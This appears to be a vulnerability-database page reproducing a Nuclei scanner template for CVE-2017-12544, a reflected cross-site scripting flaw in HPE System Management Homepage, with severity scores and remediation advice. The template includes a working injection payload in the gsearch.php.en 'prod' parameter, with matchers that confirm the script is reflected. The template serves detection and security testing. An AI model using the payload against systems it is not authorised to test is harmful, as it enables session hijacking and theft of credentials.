Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-12544
HistoryOct 12, 2021 - 4:08 a.m.

HPE System Management - Cross-Site Scripting

2021-10-1204:08:39
ProjectDiscovery
github.com
1

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

5.5 Medium

AI Score

Confidence

High

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.967 High

EPSS

Percentile

99.7%

HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

id: CVE-2017-12544

info:
  name: HPE System Management - Cross-Site Scripting
  author: divya_mudgal
  severity: medium
  description: HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
  remediation: |
    Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software.
  reference:
    - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us
    - http://web.archive.org/web/20211206092413/https://securitytracker.com/id/1039437
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12544
    - http://www.securitytracker.com/id/1039437
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2017-12544
    cwe-id: CWE-79
    epss-score: 0.96723
    epss-percentile: 0.99637
    cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: hp
    product: system_management_homepage
  tags: cve,cve2017,xss,hp

http:
  - method: GET
    path:
      - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var prodName = '';prompt`document.domain`;//';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

5.5 Medium

AI Score

Confidence

High

3.5 Low

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

0.967 High

EPSS

Percentile

99.7%